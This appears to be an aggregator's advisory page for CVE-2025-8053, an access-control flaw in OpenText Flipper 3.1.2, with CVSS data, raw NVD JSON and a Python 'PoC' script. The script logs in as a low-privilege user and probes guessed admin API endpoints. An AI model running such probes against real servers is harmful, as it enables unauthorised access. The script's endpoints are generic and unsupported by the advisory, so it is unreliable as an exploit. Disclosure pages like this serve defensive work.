Security Vulnerability Report
中文
CVE-2025-8053 CVSS 9.1 CRITICAL

CVE-2025-8053

Published: 2025-10-20 20:15:39
Last Modified: 2025-10-28 16:08:52

Description

Insufficient Granularity of Access Control vulnerability in opentext Flipper allows Exploiting Incorrectly Configured Access Control Security Levels. The vulnerability could allow a low privilege user to interact with the backend API without sufficient privileges. This issue affects Flipper: 3.1.2.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:opentext:flipper:3.1.2:*:*:*:*:*:*:* - VULNERABLE
OpenText Flipper 3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8053 - OpenText Flipper Access Control Bypass PoC # Vulnerability: Insufficient Granularity of Access Control # Affected: OpenText Flipper 3.1.2 import requests import json # Target configuration TARGET_URL = "https://target-flipper-server.com" LOW_PRIV_USER = "low_priv_user" LOW_PRIV_PASS = "password123" # Step 1: Authenticate as low-privilege user session = requests.Session() login_endpoint = f"{TARGET_URL}/api/auth/login" login_payload = { "username": LOW_PRIV_USER, "password": LOW_PRIV_PASS } response = session.post(login_endpoint, json=login_payload) print(f"[*] Login response status: {response.status_code}") if response.status_code == 200: token = response.json().get("token") session.headers.update({"Authorization": f"Bearer {token}"}) print("[+] Successfully authenticated as low-privilege user") # Step 2: Attempt to access privileged API endpoints privileged_endpoints = [ "/api/admin/users", # Admin user management "/api/admin/config", # System configuration "/api/admin/sensitive-data", # Sensitive data access "/api/v1/internal/settings", # Internal settings "/api/admin/dashboard" # Admin dashboard ] for endpoint in privileged_endpoints: url = f"{TARGET_URL}{endpoint}" resp = session.get(url) print(f"[*] Accessing {endpoint} -> Status: {resp.status_code}") if resp.status_code == 200: print(f"[!] VULNERABLE: Unauthorized access to {endpoint}") print(f" Response: {resp.text[:200]}") else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8053", "sourceIdentifier": "[email protected]", "published": "2025-10-20T20:15:38.710", "lastModified": "2025-10-28T16:08:51.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Granularity of Access Control vulnerability in opentext Flipper allows Exploiting Incorrectly Configured Access Control Security Levels. The vulnerability could allow a low privilege user to interact with the backend API without sufficient privileges.\n\nThis issue affects Flipper: 3.1.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:D/RE:M/U:Green", "baseScore": 1.0, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "PRESENT", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentext:flipper:3.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "9E0F3913-F439-4C0A-82C8-AAEEEEBED8FD"}]}]}], "references": [{"url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0850532", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}